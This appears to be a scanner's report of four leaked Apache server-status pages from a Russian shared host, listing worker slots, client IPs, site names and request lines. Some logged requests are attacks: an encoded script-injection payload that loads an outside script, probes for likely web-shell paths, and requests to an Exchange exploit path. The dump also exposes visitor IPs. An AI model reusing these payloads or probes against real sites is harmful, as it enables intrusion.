      83.99.151.67ventgrad.tomsk.ru:8080GET /index.php/katalog/manufacturer/diaf
      Found on 2024-06-13 00:50
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42b637aff7

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 13-Jun-2024 03:50:43 MSK
      Restart Time: Friday, 07-Jun-2024 14:19:16 MSK
      Parent Server Config. Generation: 145
      Parent Server MPM Generation: 144
      Server uptime:  5 days 13 hours 31 minutes 26 seconds
      Server load: 12.96 13.85 13.81
      Total accesses: 11650335 - Total Traffic: 1205.0 GB
      CPU Usage: u19.36 s4.74 cu0 cs0 - .00501% CPU load
      24.2 requests/sec - 2.6 MB/second - 108.5 kB/request
      59 requests currently being processed, 21 idle workers
      __.WW_WWWWGWWW_W_WWWWW_WWW_WWWWWG_WWWWWWWWWWWW__WWW_WWWW__W_WW__
      _WWWWWWWW____WW.WW..............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-144100370/9/392551_
      0.01026740.00.5241331.01
      192.0.101.226woostore.ru:8080HEAD / HTTP/1.0
      
      1-14499330/21/390334_
      0.05048730.00.6439820.32
      87.250.224.16olympic-story.ru:8080GET /?add_to_wishlist=2255& HTTP/1.0
      
      2-143-0/0/378681.
      0.040569960.00.0040246.71
      185.240.102.28rspp06.ru:8080GET /wp-includes/admin.php HTTP/1.0
      
      3-14499290/9/377783W
      0.01700.00.8440699.00
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      4-144102050/12/366402W
      0.02800.00.4537446.99
      95.108.213.81olympic-story.ru:8080GET /?add_to_wishlist=2367&_wpnonce=9b64e3a316 HTTP/1.0
      
      5-14499340/34/364245_
      0.0709130.01.6037735.21
      3.142.173.232ustami-mladenca.ru:8080GET /catalog/aksessuari-dla-krovatok/138/273/comfortbaby/uoma/3
      
      6-14499370/10/361926W
      0.01700.00.4238668.57
      5.255.231.54olympic-story.ru:8080GET /?add_to_wishlist=353&_wpnonce=9b64e3a316 HTTP/1.0
      
      7-144103940/17/355186W
      0.03100.00.4638840.37
      3.144.99.216ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      8-144105290/3/345076W
      0.00100.00.2135798.09
      213.180.203.97olympic-story.ru:8080GET /?add_to_wishlist=2359& HTTP/1.0
      
      9-144106850/14/342691W
      0.02600.00.2435911.16
      5.255.231.74olympic-story.ru:8080GET /?add_to_wishlist=2262&_wpnonce=9b64e3a316 HTTP/1.0
      
      10-14310150/46/336827G
      0.086000.02.2535344.39
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      11-144108660/34/328248W
      0.06300.01.5334490.74
      5.255.231.51olympic-story.ru:8080GET /?add_to_wishlist=2358& HTTP/1.0
      
      12-144110270/13/322173W
      0.01100.00.1934193.17
      173.252.87.4khochu-prodat.ru:8080GET /link.php?link=13046 HTTP/1.0
      
      13-144111770/0/314313W
      0.02900.00.0031671.38
      213.180.203.105olympic-story.ru:8080GET /?add_to_wishlist=358 HTTP/1.0
      
      14-144113410/7/303224_
      0.01034770.00.2431760.38
      95.24.159.110khochu-prodat.ru:8080GET / HTTP/1.0
      
      15-144115020/2/289640W
      0.00700.00.0030805.96
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      16-14499310/26/284966_
      0.05052330.00.8730544.15
      5.255.231.113olympic-story.ru:8080GET /?add_to_wishlist=358& HTTP/1.0
      
      17-144116610/5/277380W
      0.01100.01.1728226.37
      5.255.231.61mebozon.ru:8080GET /rossiya/divan-uglovoj-billund-gray-light-s?page=59 HTTP/1.
      
      18-144118280/6/269125W
      0.01000.00.1028934.44
      94.102.51.144art-stories.ru:8080GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cd
      
      19-144118290/13/255382W
      0.04200.00.5627056.27
      213.180.203.207olympic-story.ru:8080GET /?add_to_wishlist=2304 HTTP/1.0
      
      20-144119850/0/243700W
      0.05400.00.0025980.34
      95.108.213.218olympic-story.ru:8080GET /?add_to_wishlist=2269& HTTP/1.0
      
      21-144119860/6/235601W
      0.00100.00.0925690.89
      52.15.123.96ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      22-144119900/11/223183_
      0.02010.00.2724096.05
      74.125.212.174sudamerica.ru:8080GET /images/2024-06-12/82837.jpg HTTP/1.0
      
      23-144119980/3/207549W
      0.00300.00.0621975.87
      5.255.231.157olympic-story.ru:8080GET /?add_to_wishlist=2304& HTTP/1.0
      
      24-144121920/3/198851W
      0.00200.00.0422459.75
      173.252.107.115khochu-prodat.ru:8080GET /link.php?link=10398&d=10398 HTTP/1.0
      
      25-144121930/4/188195W
      0.00000.00.1419381.69
      95.108.213.140mebozon.ru:8080GET /gostinye/stenka-marta-10-valentina?page=7 HTTP/1.0
      
      26-144121950/7/182691_
      0.01010.00.1219111.82
      74.125.212.174sudamerica.ru:8080GET /img/sudamerica.png HTTP/1.0
      
      27-144121960/2/169593W
      0.00100.00.2218623.82
      213.180.203.105olympic-story.ru:8080GET /?add_to_wishlist=2269& HTTP/1.0
      
      28-144121990/1/162796W
      0.00100.00.0217695.54
      185.240.102.28rspp06.ru:8080GET /wp-content/admin.php?520 HTTP/1.0
      
      29-144122010/1/154387W
      0.00200.00.0317214.33
      95.108.213.116olympic-story.ru:8080GET /?add_to_wishlist=2365& HTTP/1.0
      
      30-144122070/10/155473W
      0.02100.00.3017502.63
      83.99.151.67ventgrad.tomsk.ru:8080GET /index.php/katalog/manufacturer/diaf
      Found on 2024-06-13 00:50
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb429a5387dd

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Wednesday, 12-Jun-2024 07:01:20 MSK
      Restart Time: Friday, 07-Jun-2024 14:19:16 MSK
      Parent Server Config. Generation: 126
      Parent Server MPM Generation: 125
      Server uptime:  4 days 16 hours 42 minutes 3 seconds
      Server load: 11.57 11.24 11.19
      Total accesses: 9714260 - Total Traffic: 983.3 GB
      CPU Usage: u30.05 s7.87 cu0 cs0 - .00935% CPU load
      23.9 requests/sec - 2.5 MB/second - 106.1 kB/request
      16 requests currently being processed, 9 idle workers
      _W_W.....WW..W.W_W_.__._......W.WW...W_W...WW......_W...W.......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-125321890/28/342793_
      0.06000.05.6635678.84
      147.182.149.75trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-12524380/17/340488W
      0.06000.025.8233969.16
      78.107.252.54slashfocus.ru:8080POST /gw/ HTTP/1.0
      
      2-12549350/3/331042_
      0.000310.00.1934256.41
      95.108.213.235reluy.com:8080GET /?yclid=7710547526903176844 HTTP/1.0
      
      3-125230150/54/329945W
      0.123800.03.0535117.36
      185.240.102.28rspp06.ru:8080GET /wp-includes/admin.php HTTP/1.0
      
      4-125-0/0/321335.
      0.535500.00.0032061.71
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      5-125-0/0/316383.
      0.195200.00.0032386.06
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      6-125-0/0/315811.
      0.324500.00.0033091.86
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-125-0/0/309055.
      0.382100.00.0032911.11
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      8-125-0/0/300271.
      0.124000.00.0030737.20
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      9-125266930/260/297453W
      0.591500.023.9530512.95
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      10-125235590/54/293283W
      0.11100.07.4029957.24
      52.230.152.222sleep70.ru:8080GET /vse-dlya-sna/postelnoe-bele/pokryvalo-detskoe-detail HTTP/
      
      11-125-0/0/284138.
      0.625600.00.0029083.55
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-125-0/0/279837.
      0.225100.00.0029174.56
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      13-125204820/79/273612W
      0.184000.014.7226478.31
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      14-125-0/0/262143.
      0.073100.00.0026722.88
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-125159470/142/250091W
      0.39000.011.8426254.98
      173.252.107.26mebozon.ru:8080GET /divany/pryamye-divany/divan-modulnyj-monreal-9-plyush-graf
      
      16-125245890/13/244064_
      0.020569730.01.4025728.12
      185.240.102.28rspp06.ru:8080GET /wp-content/admin.php?520 HTTP/1.0
      
      17-125126550/236/238149W
      0.59100.051.9023931.20
      87.250.224.253olympic-story.ru:8080GET /?add_to_wishlist=2304& HTTP/1.0
      
      18-12529250/185/229787_
      0.44040.037.3224425.93
      5.253.61.250xn--80aalvilddy.xn--p1ai:8080POST /wp-cron.php?doing_wp_cron=1718164879.70600295066833496093
      
      19-125-0/0/217873.
      0.064200.00.0022913.06
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-125262760/43/206095_
      0.090960.03.0221712.42
      80.82.76.214cydeavour.com:8080GET /404-1 HTTP/1.0
      
      21-125167300/124/200364_
      0.2904020.010.9121164.33
      161.35.237.119xn--80aalvilddy.xn--p1ai:8080HEAD / HTTP/1.0
      
      22-125-0/0/187616.
      0.24200.00.0020216.70
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-125264110/56/173194_
      0.190770.010.4618248.65
      173.252.83.19moto-ani.ru:8080GET /compare/102482,103364,103366,103346/ HTTP/1.0
      
      24-125-0/0/165190.
      0.016900.00.0018725.30
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-125-0/0/154834.
      0.195700.00.0015692.56
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-125-0/0/151199.
      0.026300.00.0015769.19
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-125-0/0/139629.
      0.235300.00.0015150.95
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-125-0/0/132631.
      0.241700.00.0013698.33
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-125-0/0/125144.
      0.221100.00.0013606.71
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-125275400/53/127129W
      0.11300.03.7614259.49
      5.255.231.117olympic-story.ru:8080GET /?add_to_wishlist=2365 HTTP/1.0
      
      31-125-0/0/111663.
      0.336100.00.0012270.94
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-125275430/46/107292W
      0.12000.02.7610781.55
      52.230.152.222sleep70.ru:8080GET /vse-dlya-sna/postelnoe-bele/komplekty?keyword= HTTP/1.0
      
      33-125276840/73/102122W
      0.16000.06.0910629.9
      Found on 2024-06-12 04:01
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb427c616f90

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Monday, 10-Jun-2024 03:57:05 MSK
      Restart Time: Friday, 07-Jun-2024 14:19:16 MSK
      Parent Server Config. Generation: 79
      Parent Server MPM Generation: 78
      Server uptime:  2 days 13 hours 37 minutes 48 seconds
      Server load: 10.28 12.28 13.41
      Total accesses: 5078151 - Total Traffic: 528.8 GB
      CPU Usage: u25.36 s5.52 cu0 cs0 - .0139% CPU load
      22.9 requests/sec - 2.4 MB/second - 109.2 kB/request
      11 requests currently being processed, 10 idle workers
      _WW_W_C__WW__WWW___W....W.......................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-7818400/52/202852_
      0.1201850.02.0621671.78
      212.115.49.12newkomok.ru:8080GET / HTTP/1.0
      
      1-7812760/76/201741W
      0.15100.03.3921115.39
      5.253.61.250groupanalysis.net:8080GET /polozhenie-tk-ogra-ob-akkreditacii-kursov-i-seminarov-ogra
      
      2-7813120/3/197144W
      0.004100.00.4020554.54
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      3-7813500/87/197537_
      0.18000.011.4021624.26
      138.68.144.227trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      4-7812480/55/192180W
      0.12200.02.4519501.02
      185.240.102.28imfox.ru:8080POST /wp-admin/admin-ajax.php?action=as_async_request_queue_run
      
      5-7813900/74/186268_
      0.2102400.03.5519628.63
      173.252.87.2happy-zoo.ru:8080GET /index.php/katalog/konservy-vlazhnyj-korm/manufacturer/gurm
      
      6-7825641/9/185958C
      0.02000.30.0519567.65
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-7826160/3/182030_
      0.0003300.00.0620171.84
      185.170.167.18tehnodom.org:8080GET /id/elektricheskiy-konvektor-oasis-lk-15-19902.html HTTP/1.
      
      8-7815050/28/174635_
      0.0503740.01.2918834.51
      3.142.98.186ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      9-7812520/1/176636W
      0.004300.00.0018829.86
      31.184.236.12sleep70.ru:8080GET /detyam/kolgotki-detskie-raznotsvetnye-s-risunkom-detail HT
      
      10-7812540/30/171509W
      0.063000.01.6317731.29
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      11-7826170/6/166599_
      0.010860.00.0817669.93
      64.124.8.25mapsshop.ru:8080GET /vektornaja_karta_poselka_preobrazhenskij_685656_eps.html H
      
      12-7815570/58/162245_
      0.130470.017.4817413.84
      64.124.8.25mapsshop.ru:8080GET /vektornaja_karta_poselka_melinikovo_665368_mif/data/pictur
      
      13-7815770/54/156581W
      0.12000.02.2515353.35
      64.124.8.25mapsshop.ru:8080GET /vektornaja_karta_poselka_mihajlovka_620141_tab.html HTTP/1
      
      14-7816250/58/149856W
      0.13000.02.9016001.35
      87.250.224.41xn--80aedtqhfh.xn--p1ai:8080GET /product_info.php?products_id=11767 HTTP/1.0
      
      15-7816480/48/143350W
      0.09000.02.0615616.60
      138.68.144.227trustdefend.org:8080GET /server-status HTTP/1.0
      
      16-7816490/49/136427_
      0.100320.01.9214869.50
      18.117.103.28ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      17-7817040/54/133246_
      0.11014910.01.9213260.77
      69.171.249.116khochu-prodat.ru:8080GET /link.php?link=14402&ver=full HTTP/1.0
      
      18-7818770/33/129547_
      0.060870.01.9314116.27
      83.99.151.71zworkstation.ru:8080GET /shop/options/K4T76AA/ HTTP/1.0
      
      19-7818780/7/119772W
      0.011900.00.4212742.18
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      20-77-0/0/111831.
      0.008200.00.0011605.40
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-77-0/0/108020.
      0.046100.00.0011953.86
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-77-0/0/97747.
      0.135900.00.0011156.49
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-77-0/0/88463.
      0.206900.00.009611.88
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-7812460/40/82882W
      0.07000.01.289717.10
      173.252.83.37khochu-prodat.ru:8080GET /zhaloba.php?link=11166 HTTP/1.0
      
      25-77-0/0/74958.
      0.017800.00.007996.31
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-77-0/0/71096.
      0.06439640.00.007613.50
      87.250.224.231moto-ani.ru:8080GET /search/?query=patron+tribute HTTP/1.0
      
      27-77-0/0/67006.
      0.147900.00.006816.23
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-78-0/0/59010.
      0.17700.00.007234.96
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-77-0/0/57998.
      0.008400.00.006000.83
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-77-0/0/56984.
      0.036800.00.006729.41
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-77-0/0/49970.
      0.0438253180.00.005274.18
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      32-77-0/0/465
      Found on 2024-06-10 00:57
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb4236727b1f

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Saturday, 08-Jun-2024 03:56:58 MSK
      Restart Time: Friday, 07-Jun-2024 14:19:16 MSK
      Parent Server Config. Generation: 27
      Parent Server MPM Generation: 26
      Server uptime:  13 hours 37 minutes 41 seconds
      Server load: 12.99 13.04 12.45
      Total accesses: 1049904 - Total Traffic: 115.1 GB
      CPU Usage: u21.48 s4.74 cu0 cs0 - .0534% CPU load
      21.4 requests/sec - 2.4 MB/second - 114.9 kB/request
      10 requests currently being processed, 9 idle workers
      W_.WW._WW_.W_WW__.W__._......................................G..
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-26134650/4/42311W
      0.00000.00.104658.70
      173.252.83.33khochu-prodat.ru:8080GET /link.php?link=20451&d=20451 HTTP/1.0
      
      1-26134970/38/42394_
      0.0709790.03.044683.41
      43.204.227.188nuriarhipova.ru:8080GET / HTTP/1.0
      
      2-26-0/0/40271.
      0.051100.00.004435.16
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      3-26135190/69/40916W
      0.16000.03.145328.77
      5.255.231.20mintim.ru:8080GET /tag/shunga/ HTTP/1.0
      
      4-26134380/50/40122W
      0.11000.02.074547.84
      87.250.224.24mintim.ru:8080GET /category/dlya-nee/?page=9&sort=name&order=asc HTTP/1.0
      
      5-26-0/0/38344.
      0.10200.00.004081.32
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      6-26135850/11/37721_
      0.020590.00.734427.60
      144.202.122.114shtopor.wine:8080GET /vino-kr-sukh-undurraga-tkh-terruar-khanter-pino-nuar-do-20
      
      7-26136440/27/37111W
      0.05600.01.333798.95
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      8-26134370/34/37924W
      0.09800.05.004044.65
      37.228.114.248japan-tackle.ru:8080GET /exchange1c?type=catalog&mode=import&filename=offers.xml&PH
      
      9-26136960/56/35991_
      0.110710.02.743946.19
      144.202.122.114shtopor.wine:8080GET /distillyat-zernovoy-polugar--4-385-05-l/ HTTP/1.0
      
      10-26-0/0/35036.
      0.01700.00.004263.99
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      11-26137630/31/34338W
      0.07000.01.013813.21
      157.245.105.107trustdefend.org:8080GET /server-status HTTP/1.0
      
      12-26137970/62/32032_
      0.09013410.02.543918.31
      178.176.75.54persant.ru:8080GET /smesiteli/?page=249 HTTP/1.0
      
      13-26138400/40/31492W
      0.08000.01.043700.39
      95.108.213.97mintim.ru:8080GET /category/intimnaya-kosmetika/prolongatory/ HTTP/1.0
      
      14-26138920/22/31356W
      0.03000.01.283472.65
      51.195.90.123mc-authenticpsychology.ru:8080HEAD /shop/buster-svoboda/ HTTP/1.0
      
      15-26138940/50/30631_
      0.110380.07.273397.19
      3.147.82.227ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      16-26139490/23/29001_
      0.07014680.01.733062.88
      173.252.83.1khochu-prodat.ru:8080GET /link.php?link=25337&ver=full HTTP/1.0
      
      17-26-0/0/26866.
      0.021200.00.002882.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-26134330/43/25361W
      0.081500.01.382901.97
      76.138.249.182sleep70.ru:8080GET /vse-dlya-sna/postelnoe-bele/prostyn-trikotazhnaya-na-rezin
      
      19-26139530/18/23840_
      0.03021340.00.772639.88
      69.171.249.15naviglon.ru:8080GET /products_new.php?action=wishlist_now&BUYproducts_id=14770&
      
      20-26139540/33/23365_
      0.060260.03.032466.18
      66.249.69.172sales-board.ru:8080GET /m/index.php?r=1&category=1&srpodrazdel=&srrazdel=1653&srco
      
      21-25-0/0/22008.
      0.006600.00.002344.90
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-26134340/60/20075_
      0.140960.010.732304.13
      217.74.39.172moto-ani.ru:8080GET /category/honda-lead-af2048-100ss/ HTTP/1.0
      
      23-25-0/0/17810.
      0.026500.00.001750.55
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-25-0/0/16822.
      0.033300.00.002294.61
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-25-0/0/16785.
      0.017100.00.001853.81
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-25-0/0/14691.
      0.044300.00.001540.60
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-25-0/0/13615.
      0.027400.00.001234.05
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-25-0/0/13000.
      0.042890.00.001884.00
      213.180.203.98vidook.ru:8080GET /bunyodkor/9xDdKXh2ncQ HTTP/1.0
      
      29-25-0/0/11656.
      0.032810080.00.001406.25
      51.195.90.123mc-authenticpsychology.ru:8080GET /korzina/ HTTP/1.0
      
      30-25-0/0/12934.
      0.035700.00.001523.33
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-25-0/0/10252.
      0.04281630.00.001237.66
